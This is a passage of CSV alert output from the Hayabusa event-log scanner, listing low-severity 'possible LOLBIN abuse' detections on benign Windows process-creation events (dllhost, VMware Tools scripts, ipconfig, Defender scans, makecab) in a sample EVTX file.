2016-08-19 07:54:48.720 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0xc0c | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-19 07:54:49.720 +09:00,IE10Win7,4688,low,,Suspicious Cmd 
Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\resume-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0x7c4 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-19 07:54:49.751 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /renew | Path: C:\Windows\System32\ipconfig.exe | PID: 0xf50 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-19 07:55:08.329 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0xb0c | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-19 08:06:57.658 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\suspend-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0x85c | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-19 08:06:57.658 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /release | Path: C:\Windows\System32\ipconfig.exe | PID: 0xcf4 | User: IE10WIN7$ | LID: 
0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-19 11:07:47.630 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x7f0 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-19 11:07:48.599 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\resume-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0xb78 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-19 11:07:48.599 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /renew | Path: C:\Windows\System32\ipconfig.exe | PID: 0x37c | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-19 11:08:02.052 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x708 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-19 11:08:08.052 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe 
/Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x8e0 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-19 11:12:51.579 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\suspend-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0x238 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-19 11:12:51.579 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /release | Path: C:\Windows\System32\ipconfig.exe | PID: 0xe8 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-19 11:19:46.662 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0xc68 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-19 11:19:47.615 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\resume-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0x914 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-19 11:19:47.615 
+09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /renew | Path: C:\Windows\System32\ipconfig.exe | PID: 0x994 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-19 11:20:06.599 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x998 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-19 11:20:16.443 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\suspend-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0x3c0 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-19 11:20:16.443 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /release | Path: C:\Windows\System32\ipconfig.exe | PID: 0x928 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-19 11:20:16.834 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0xd48 | User: IE10WIN7$ | LID: 
0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-19 22:57:54.738 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\resume-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0xe60 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-19 22:57:55.301 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /renew | Path: C:\Windows\System32\ipconfig.exe | PID: 0xef8 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-19 22:57:59.004 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\schtasks.exe /delete /f /TN ""Microsoft\Windows\Customer Experience Improvement Program\Uploader"" | Path: C:\Windows\System32\schtasks.exe | PID: 0x82c | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-19 22:58:15.410 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0xbbc | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-19 22:59:20.128 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: 
""C:\Windows\system32\wuauclt.exe"" /RunHandlerComServer | Path: C:\Windows\System32\wuauclt.exe | PID: 0xb24 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-19 23:01:29.243 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0x22c | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-20 01:01:36.820 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""c:\program files\windows defender\MpCmdRun.exe"" Scan -ScheduleJob -WinTask -RestrictPrivilegesScan | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0xf8c | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-20 01:01:36.883 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""c:\program files\windows defender\MpCmdRun.exe"" Scan -ScheduleJob -WinTask -RestrictPrivilegesScan -Reinvoke | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0x268 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-20 01:01:36.898 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""c:\program files\windows defender\MpCmdRun.exe"" SignaturesUpdateService -ScheduleJob | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0xc68 | User: IE10WIN7$ | LID: 
0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-20 01:03:36.695 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\rundll32.exe aepdu.dll,AePduRunUpdate | Path: C:\Windows\System32\rundll32.exe | PID: 0x68c | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-20 01:57:08.802 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\rundll32.exe /d acproxy.dll,PerformAutochkOperations | Path: C:\Windows\System32\rundll32.exe | PID: 0xc5c | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-20 02:02:48.677 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\System32\rundll32.exe shell32.dll,SHCreateLocalServerRunDll {995C996E-D918-4a8c-A302-45719A6F4EA7} -Embedding | Path: C:\Windows\System32\rundll32.exe | PID: 0xcbc | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-20 02:02:52.614 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x598 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-20 05:09:55.671 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: 
C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\resume-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0x3cc | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-20 05:09:57.781 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /renew | Path: C:\Windows\System32\ipconfig.exe | PID: 0xb84 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-20 05:10:11.609 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0xe9c | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-20 05:10:17.702 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x2f0 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-20 05:12:20.805 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\suspend-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0xfd0 | User: IE10WIN7$ | LID: 
0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-20 05:12:20.805 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /release | Path: C:\Windows\System32\ipconfig.exe | PID: 0x46c | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-20 05:47:30.057 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0xe4 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-20 05:47:31.026 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\resume-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0x6a0 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-20 05:47:31.073 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /renew | Path: C:\Windows\System32\ipconfig.exe | PID: 0x9c | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-20 05:47:46.745 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: 
C:\Windows\System32\dllhost.exe | PID: 0xe6c | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-20 06:12:04.462 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0xda0 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-20 06:12:28.290 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x130 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-20 06:12:41.946 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x4b0 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-20 06:13:05.290 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0xfe4 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-20 08:02:20.062 +09:00,IE10Win7,4688,low,,Suspicious Cmd 
Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0xfe0 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-20 08:02:20.640 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\resume-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0xd18 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-20 08:02:22.265 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /renew | Path: C:\Windows\System32\ipconfig.exe | PID: 0x910 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-20 08:02:35.890 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x494 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-20 08:02:40.458 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\suspend-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0x720 | User: IE10WIN7$ | LID: 
0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-20 08:02:40.458 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /release | Path: C:\Windows\System32\ipconfig.exe | PID: 0x914 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-21 01:03:06.082 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\makecab.exe"" C:\Windows\Logs\CBS\CbsPersist_20160820160305.log C:\Windows\Logs\CBS\CbsPersist_20160820160305.cab | Path: C:\Windows\System32\makecab.exe | PID: 0xce8 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-21 01:03:06.176 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0xdb0 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-21 01:03:07.144 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\resume-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0xf34 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-21 01:03:07.801 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: 
C:\Windows\system32\ipconfig /renew | Path: C:\Windows\System32\ipconfig.exe | PID: 0x250 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-21 01:03:11.676 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\wuauclt.exe"" /RunHandlerComServer | Path: C:\Windows\System32\wuauclt.exe | PID: 0x614 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-21 01:03:25.629 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0xc04 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-21 01:06:05.381 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\schtasks.exe /delete /f /TN ""Microsoft\Windows\Customer 